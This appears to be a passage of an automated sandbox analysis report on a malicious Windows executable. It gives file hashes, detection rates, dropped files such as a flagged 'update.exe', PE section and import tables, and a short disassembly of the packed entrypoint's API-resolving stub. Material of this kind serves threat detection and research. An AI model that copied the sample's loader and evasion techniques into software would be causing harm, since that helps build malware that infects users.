Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\0BAC4DC5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WIJSmB.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Download File

Process:	C:\Users\user\Desktop\5vrRrFN56j.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Joe Sandbox View:	Filename: BXOZIGZEUa.exe, Detection: malicious, Browse Filename: BXOZIGZEUa.exe, Detection: malicious, Browse Filename: ArjM1qx3hV.exe, Detection: malicious, Browse Filename: aRxo3E278B.exe, Detection: malicious, Browse Filename: yRc7UfFif9.exe, Detection: malicious, Browse Filename: gT6IitwToH.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Users\user\Desktop\5vrRrFN56j.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	422
Entropy (8bit):	3.9822709529024487
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmWvclLwv2G4wmL66uCEuyLyn:QCGwv4o0BlLweTL66uuyW
MD5:	12848C48DA8097C0879B053388DFBAA3
SHA1:	EDA6082B0982F73B9AEF2FABA3F867BE30EC04C9
SHA-256:	2573DC5A90C39667074D2CEB4F18DA5F4713708B6CF6A52D0675707A222D392F
SHA-512:	C9CFFDA09CB896665BFE70F238E3F5727AB8B12F4BDDA78137A39065D769BB9F7A5022300D9E0BCD5710FFC0376983FCE29876294F4D9A2C382ACBC7EBEEEDBE
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.o.c.u.m.e.n.t.s.\.1.9.C.A.D.7.2.1.B.5.9.B.0.9.B.2.0.8.B.5.A.7.E.2.F.6.3.8.7.8.4.3...i.c.o.....I.n.f.o.T.i.p.=.....Q............. ............. .................Q.Q.........................

C:\Users\user\Desktop\update.exe

Download File

Process:	C:\Users\user\Desktop\5vrRrFN56j.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	954368
Entropy (8bit):	6.344965617584001
Encrypted:	false
SSDEEP:	24576:YvtI2D6CEhvugYa3EZfup4jflORg0RBQI:YevLEZ7cRg0RJ
MD5:	8A619EBB79546DD4487F312B9C57934F
SHA1:	6986759E032DB2694D625C85EC5C8B4AD74A689B
SHA-256:	0C274B149400E89EBC0F6335A9181005B4249CABEFA8EC8B47C1D56710B2D3EF
SHA-512:	AB29923B35AA1D21813F9D6B012979385F7C4B161FEE51C28A4987768B93297C81E88EAA969B9F491F0A359FD18F3515CC19C694ABD95413A575053C5BA29C7B
Malicious:	true
Yara Hits:	Rule: CN_Honker_WordpressScanner, Description: Sample from CN Honker Pentest Toolset - file WordpressScanner.exe, Source: C:\Users\user\Desktop\update.exe, Author: Florian Roth
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......p.-.4.C.4.C.4.C.[.H.=.C.[.I.2.C...M...C.O.O.1.C.b.P...C.V.P.(.C.4.B...C.....7.C...H.E.C...I..C..H.W.C..I./.C.4.C.m.C..E.5.C.Rich4.C.........................PE..L.....\|g.........................................@..........................................................................Q..,....0...e..............................................................................0............................text...n........................... ..`.rdata.............................@..@.data...j...........................@....rsrc....e...0...p... ..............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\19CAD721B59B09B208B5A7E2F6387843.ico

Download File

Process:	C:\Users\user\Desktop\5vrRrFN56j.exe
File Type:	MS Windows icon resource - 1 icon, -128x-128, 32 bits/pixel
Category:	dropped
Size (bytes):	67646
Entropy (8bit):	5.7039139970238075
Encrypted:	false
SSDEEP:	1536:vrpcQaRJlr5a3QEC2ADfYVmqpPZf++r7MJsEzlDtr66Evbag:vrpcQaGHVmOhf++razdtYp
MD5:	19CAD721B59B09B208B5A7E2F6387843
SHA1:	7AB6F085A11E86D5514E182BF0DF1C96723C8901
SHA-256:	F9DFF22EF297227202F34343DA1BA9585F843B3AA0834B1074F273C9D9542252
SHA-512:	E6DB461CB85A7B4C9F44019678E49562B68B820FFF6F0EE82A7533F710858C7AA7DF72FE57E4FE0A6A8291C33AAD819C5DCD7B75F9A55CFF12AF12344A555E81
Malicious:	false
Preview:	............ .(.......(............. .................................................200.............................................. ...! ..! ..! ..$!..$!..$"..%#..&#..&#..'$..'$..(%.!(%.&+).),.,-+.,-+.),.-+.,-+.-.,.+.,.+.,.-.,.-.,.-.,.,-+.,,.(-,.(-,.'-,.'-,.'-,.&.-.'/..)/..)/..+32.+32.-32.-32.+33.+33.-32.-32..43..43..31..31..31..31..31./42.-41.+2/./-.+0..+2/.+2/.-0..).,.(-+.'.+.'.+.'.+.(-+.'.+.(/,.&/,.(/,.(/,.(/,.(/,.(/,.(/,.(/,.&/,.#,).!,). +(..'..(%..'$..%"..%"..&$..&$..$#..#"..#".."!.." .." .........................................PRR.............................................#%&.............................................. ..!!..!!..#!..$"..&$..%#..'$..&$..(%..'%..(&..(&..)'.!,.$,+.%-,.%-,.%-,.%-,.&.-.'/..'20.(31.21.21.21.+32.)33.)33.44.(44.)55.)55.)55.)55.66.+77.)55.)55.)55.)55.)55.)55.)55.)55.-77.-86.-86.-86.-86.-86.-86.-86.,75.+64.)42.(31.+64.+64.+32.(31.)42.'42.'42.'42.'42.'42.'42.&42.#0..#0..#0.."/-."/-.!.,.!.,.!.,..-+...+..,..,)..(..)&..'%..&$..%#..%$..$

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\WIJSmB.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422054257872009
Encrypted:	false
SSDEEP:	6144:ZSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNX0uhiTw:QvloTMW+EZMM6DFyB03w
MD5:	7D9910B2922194554006BE23F722FC56
SHA1:	FB8C5B965EE07127F495F908062A3A0775EF4E61
SHA-256:	0B80DDD8208BC991CA8E0F3F396A113303B869D59B0FFA5E36CFCED647611D0F
SHA-512:	4833D9307DE7C3FD4D376E5575E001E7063889885068F574FE080417265AFBDB9AE25593DA0ED38E87835DB2A71FA0CE11B02073D8BE0A53B275DC46B733F7D1
Malicious:	false
Preview:	regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..75.e..............................................................................................................................................................................................................................................................................................................................................Tz .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.077950124438588
TrID:	Win32 Executable (generic) a (10002005/4) 99.26% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02%
File name:	5vrRrFN56j.exe
File size:	5'541'376 bytes
MD5:	5ad1a67084ee167d59560fbaec7529fe
SHA1:	9bc3b2a106eb0a8281bfa47baeeb0369d87f8036
SHA256:	ddd4a05ff6d0d64d56f4e49d9afbcaa80d20304163797f08f5f18804e73f795e
SHA512:	8357db5780cab2b46a94f8a00bfe730e11bf0826ee6a3228fc7fa0911cbb006266c3be074fc0206ee4b1fde7615c36cef23b3b5ccd4d010330770c52f038bfa0
SSDEEP:	98304:4wq41aKya1ukH7iE9muTEZ7ce0RM52Pw8B4DUswLUJBAUZL:Bq41aKya1W5V0RMYPxolhJV
TLSH:	9846C023F142C0B2E1160AB021B6573DAA79DF515E74C983EBE4FEB9BC73122976510E
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........D.}ID.}ID.}I+.vIM.}I+.wIB.}I?.qIA.}I..nIh.}I.. IF.}I..sIh.}ID.\|I..}I&.nI[.}IM..IE.}I..oIN.}Ir.vI..}Ir.wI..}I..vI*.}I..wIt.}

File Icon


Icon Hash:	2731d28aae6e218f

Static PE Info

General

Entrypoint:	0x9a9000
Entrypoint Section:	B5xBu
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x67824263 [Sat Jan 11 10:05:23 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2bbe6c36c6f18214d3400bb75b6c0bf1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 534A4957h
mov dword ptr [ebp-44h], 652E426Dh
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FF3F5074965h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFC0C04Fh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FF3F5074AAEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FF3F50749B4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FF3F50749ABh

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[C++] VS98 (6.0) SP6 build 8804
[ C ] VS98 (6.0) SP6 build 8804
[C++] VS98 (6.0) build 8168
[ C ] VS98 (6.0) build 8168
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x511a00	0x168	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5a1000	0x791c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1e5000	0x810	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1e370e	0x1e3800	1eb7ef2d4573ec84862b5df4891892e3	False	0.3853453011892451	data	6.392464957311664	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1e5000	0x32f3a8	0x32f400	d0902d70205d385a7ec0ecd8421a7a90	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x515000	0x8b44a	0x2a200	b6ae4a10d51da9b477058cdd3960dd7f	False	0.35095395956973297	data	5.964256341259555	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5a1000	0x791c	0x7a00	e530300d5fc7c550178f7ba7e68665cc	False	0.44041367827868855	data	5.293603761108245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
B5xBu	0x5a9000	0x5000	0x4200	7c10c5d719d854eabba404eec876c26e	False	0.7772845643939394	data	6.934706374303615	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
TEXTINCLUDE	0x5a1d9c	0xb	ASCII text, with no line terminators	Chinese	China	1.7272727272727273
TEXTINCLUDE	0x5a1da8	0x16	data	Chinese	China	1.3636363636363635
TEXTINCLUDE	0x5a1dc0	0x151	C source, ASCII text, with CRLF line terminators	Chinese	China	0.6201780415430267
WAVE	0x5a1f14	0x1448	RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 22050 Hz	Chinese	China	0.8330123266563945
RT_CURSOR	0x5a335c	0x134	data	Chinese	China	0.5811688311688312
RT_CURSOR	0x5a3490	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	Chinese	China	0.37662337662337664
RT_CURSOR	0x5a35c4	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Chinese	China	0.4805194805194805
RT_CURSOR	0x5a36f8	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Chinese	China	0.7
RT_CURSOR	0x5a37ac	0x134	AmigaOS bitmap font "(", fc_YSize 4294967292, 3840 elements, 2nd "\377\370\017\377\377\374\037\377\377\376?\377\377\377\177\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Chinese	China	0.32792207792207795
RT_CURSOR	0x5a38e0	0x134	AmigaOS bitmap font "(", fc_YSize 4294967288, 3840 elements, 2nd "\377\370\037\377\377\370\037\377\377\370\037\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Chinese	China	0.3246753246753247
RT_BITMAP	0x5a3a14	0x16c	Device independent bitmap graphic, 39 x 13 x 4, image size 260	Chinese	China	0.3598901098901099
RT_BITMAP	0x5a3b80	0x248	Device independent bitmap graphic, 64 x 15 x 4, image size 480	Chinese	China	0.3407534246575342
RT_BITMAP	0x5a3dc8	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Chinese	China	0.4444444444444444
RT_BITMAP	0x5a3f0c	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m	Chinese	China	0.26453488372093026
RT_BITMAP	0x5a4064	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m	Chinese	China	0.2616279069767442
RT_BITMAP	0x5a41bc	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m	Chinese	China	0.2441860465116279
RT_BITMAP	0x5a4314	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m	Chinese	China	0.24709302325581395
RT_BITMAP	0x5a446c	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m	Chinese	China	0.2238372093023256
RT_BITMAP	0x5a45c4	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240	Chinese	China	0.19476744186046513
RT_BITMAP	0x5a471c	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240	Chinese	China	0.20930232558139536
RT_BITMAP	0x5a4874	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240	Chinese	China	0.18895348837209303
RT_BITMAP	0x5a49cc	0x5e4	Device independent bitmap graphic, 70 x 39 x 4, image size 1404	Chinese	China	0.34615384615384615
RT_BITMAP	0x5a4fb0	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Chinese	China	0.44565217391304346
RT_BITMAP	0x5a5068	0x16c	Device independent bitmap graphic, 39 x 13 x 4, image size 260	Chinese	China	0.28296703296703296
RT_BITMAP	0x5a51d4	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Chinese	China	0.37962962962962965
RT_ICON	0x5a5318	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	Chinese	China	0.26344086021505375
RT_ICON	0x5a5600	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	Chinese	China	0.41216216216216217
RT_ICON	0x5a5728	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.5215759849906192
RT_MENU	0x5a67d0	0xc	data	Chinese	China	1.5
RT_MENU	0x5a67dc	0x284	data	Chinese	China	0.5
RT_DIALOG	0x5a6a60	0x98	data	Chinese	China	0.7171052631578947
RT_DIALOG	0x5a6af8	0x17a	data	Chinese	China	0.5185185185185185
RT_DIALOG	0x5a6c74	0xfa	data	Chinese	China	0.696
RT_DIALOG	0x5a6d70	0xea	data	Chinese	China	0.6239316239316239
RT_DIALOG	0x5a6e5c	0x8ae	data	Chinese	China	0.39603960396039606
RT_DIALOG	0x5a770c	0xb2	data	Chinese	China	0.7359550561797753
RT_DIALOG	0x5a77c0	0xcc	data	Chinese	China	0.7647058823529411
RT_DIALOG	0x5a788c	0xb2	data	Chinese	China	0.6629213483146067
RT_DIALOG	0x5a7940	0xe2	data	Chinese	China	0.6637168141592921
RT_DIALOG	0x5a7a24	0x18c	data	Chinese	China	0.5227272727272727
RT_STRING	0x5a7bb0	0x50	data	Chinese	China	0.85
RT_STRING	0x5a7c00	0x2c	data	Chinese	China	0.5909090909090909
RT_STRING	0x5a7c2c	0x78	data	Chinese	China	0.925
RT_STRING	0x5a7ca4	0x1c4	data	Chinese	China	0.8141592920353983
RT_STRING	0x5a7e68	0x12a	data	Chinese	China	0.5201342281879194
RT_STRING	0x5a7f94	0x146	data	Chinese	China	0.6288343558282209
RT_STRING	0x5a80dc	0x40	data	Chinese	China	0.65625
RT_STRING	0x5a811c	0x64	data	Chinese	China	0.73
RT_STRING	0x5a8180	0x1d8	data	Chinese	China	0.6758474576271186
RT_STRING	0x5a8358	0x114	data	Chinese	China	0.6376811594202898
RT_STRING	0x5a846c	0x24	data	Chinese	China	0.4444444444444444
RT_GROUP_CURSOR	0x5a8490	0x14	data	Chinese	China	1.4
RT_GROUP_CURSOR	0x5a84a4	0x14	data	Chinese	China	1.4
RT_GROUP_CURSOR	0x5a84b8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.25
RT_GROUP_CURSOR	0x5a84cc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.25
RT_GROUP_CURSOR	0x5a84e0	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China	1.0294117647058822
RT_GROUP_ICON	0x5a8504	0x14	data			1.2
RT_GROUP_ICON	0x5a8518	0x14	data	Chinese	China	1.2
RT_GROUP_ICON	0x5a852c	0x14	data	Chinese	China	1.25
RT_VERSION	0x5a8540	0x20c	data	Chinese	China	0.5515267175572519
RT_MANIFEST	0x5a874c	0x1cd	XML 1.0 document, ASCII text, with very long lines (461), with no line terminators			0.5878524945770065

Imports

DLL	Import
MSVFW32.dll	DrawDibDraw
AVIFIL32.dll	AVIStreamGetFrame, AVIStreamInfoA
iphlpapi.dll	GetAdaptersInfo
WINMM.dll	midiStreamRestart, midiStreamClose, midiOutReset, midiStreamStop, waveOutRestart, waveOutUnprepareHeader, waveOutPrepareHeader, waveOutWrite, waveOutPause, waveOutReset, waveOutClose, midiStreamOut, midiOutPrepareHeader, midiStreamProperty, midiStreamOpen, midiOutUnprepareHeader, waveOutOpen, waveOutGetNumDevs, PlaySoundA
WS2_32.dll	inet_ntoa, WSAStartup, WSACleanup, select, send, closesocket, WSAAsyncSelect, recvfrom, ioctlsocket, recv, getpeername, accept, ntohl
RASAPI32.dll	RasGetConnectStatusA, RasHangUpA
KERNEL32.dll	GetVersion, FileTimeToSystemTime, TerminateThread, VirtualAlloc, VirtualFree, CreateMutexA, ReleaseMutex, SuspendThread, InterlockedIncrement, InterlockedDecrement, LocalFree, FileTimeToLocalFileTime, lstrcpynA, DuplicateHandle, FlushFileBuffers, LockFile, UnlockFile, SetEndOfFile, lstrcmpiA, GlobalDeleteAtom, GlobalFindAtomA, GlobalAddAtomA, GlobalGetAtomNameA, lstrcmpA, LocalAlloc, TlsAlloc, GlobalHandle, TlsFree, TlsSetValue, LocalReAlloc, TlsGetValue, GetFileTime, GetCurrentThread, GlobalFlags, SetErrorMode, GetProcessVersion, GetCPInfo, GetOEMCP, GetStartupInfoA, RtlUnwind, GetSystemTime, GetLocalTime, RaiseException, HeapSize, GetACP, SetStdHandle, GetFileType, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetEnvironmentVariableA, HeapDestroy, HeapCreate, SetEnvironmentVariableA, LCMapStringA, LCMapStringW, IsBadWritePtr, SetUnhandledExceptionFilter, GetStringTypeA, GetStringTypeW, CompareStringA, CompareStringW, IsBadReadPtr, IsBadCodePtr, SetLastError, GetSystemDirectoryA, GetWindowsDirectoryA, TerminateProcess, GetCurrentProcess, GetFileSize, SetFilePointer, CreateSemaphoreA, ResumeThread, ReleaseSemaphore, EnterCriticalSection, LeaveCriticalSection, GetProfileStringA, WriteFile, WaitForMultipleObjects, CreateFileA, SetEvent, FindResourceA, LoadResource, LockResource, ReadFile, lstrlenW, RemoveDirectoryA, GetModuleFileNameA, GetCurrentThreadId, ExitProcess, GlobalSize, GlobalFree, DeleteCriticalSection, InitializeCriticalSection, lstrcatA, lstrlenA, WinExec, lstrcpyA, FindNextFileA, GlobalReAlloc, HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetUserDefaultLCID, MultiByteToWideChar, WideCharToMultiByte, GetFullPathNameA, FreeLibrary, LoadLibraryA, GetLastError, GetVersionExA, WritePrivateProfileStringA, GetPrivateProfileStringA, CreateThread, CreateEventA, Sleep, GlobalAlloc, GlobalLock, GlobalUnlock, GetTempPathA, FindFirstFileA, FindClose, SetFileAttributesA, GetFileAttributesA, MoveFileA, DeleteFileA, CopyFileA, CreateDirectoryA, SetCurrentDirectoryA, GetVolumeInformationA, GetModuleHandleA, GetProcAddress, MulDiv, SetLocalTime, GetCommandLineA, GetTickCount, WaitForSingleObject, CloseHandle, InterlockedExchange, GetTimeZoneInformation
USER32.dll	GetSysColorBrush, GetMenuCheckMarkDimensions, GetMenuState, SetMenuItemBitmaps, CheckMenuItem, MoveWindow, IsDialogMessageA, ScrollWindowEx, SendDlgItemMessageA, MapWindowPoints, AdjustWindowRectEx, GetScrollPos, RegisterClassA, GetMenuItemCount, GetMenuItemID, SetWindowsHookExA, CallNextHookEx, GetClassLongA, SetPropA, UnhookWindowsHookEx, GetPropA, RemovePropA, GetMessageTime, GetLastActivePopup, RegisterWindowMessageA, GetWindowPlacement, EndDialog, CreateDialogIndirectParamA, DestroyWindow, GrayStringA, DrawTextA, TabbedTextOutA, EndPaint, BeginPaint, GetWindowDC, CharUpperA, GetWindowTextLengthA, SetWindowTextA, GetForegroundWindow, UnregisterHotKey, RegisterHotKey, CreateWindowExA, CallWindowProcA, GetWindowTextA, GetDlgItem, GetClassNameA, GetDesktopWindow, DrawStateA, FrameRect, GetNextDlgTabItem, LoadIconA, TranslateMessage, DrawFrameControl, DrawEdge, DrawFocusRect, WindowFromPoint, GetMessageA, DispatchMessageA, SetRectEmpty, RegisterClipboardFormatA, CreateIconFromResourceEx, DrawIconEx, CreatePopupMenu, AppendMenuA, ModifyMenuA, CreateMenu, CreateAcceleratorTableA, GetDlgCtrlID, GetSubMenu, EnableMenuItem, ClientToScreen, EnumDisplaySettingsA, LoadImageA, SystemParametersInfoA, ShowWindow, IsWindowEnabled, TranslateAcceleratorA, GetKeyState, CopyAcceleratorTableA, PostQuitMessage, IsZoomed, GetClassInfoA, DefWindowProcA, GetSystemMenu, DeleteMenu, GetMenu, SetMenu, PeekMessageA, IsIconic, SetFocus, GetActiveWindow, GetWindow, DestroyAcceleratorTable, SetWindowRgn, GetMessagePos, ScreenToClient, ChildWindowFromPointEx, CopyRect, LoadBitmapA, WinHelpA, KillTimer, SetTimer, ReleaseCapture, GetCapture, SetCapture, GetScrollRange, SetScrollRange, SetScrollPos, SetRect, InflateRect, DestroyIcon, PtInRect, OffsetRect, IsWindowVisible, EnableWindow, RedrawWindow, GetWindowLongA, SetWindowLongA, GetSysColor, SetActiveWindow, SetCursorPos, LoadCursorA, SetCursor, GetDC, FillRect, IsRectEmpty, ReleaseDC, IsChild, TrackPopupMenu, DestroyMenu, SetForegroundWindow, GetWindowRect, EqualRect, UpdateWindow, ValidateRect, InvalidateRect, GetClientRect, GetFocus, GetParent, GetTopWindow, PostMessageA, IsWindow, SetParent, DestroyCursor, SendMessageA, SetWindowPos, MessageBoxA, GetCursorPos, GetSystemMetrics, EmptyClipboard, SetClipboardData, OpenClipboard, GetClipboardData, CloseClipboard, wsprintfA, LoadStringA, CreateIconFromResource, IntersectRect, UnregisterClassA
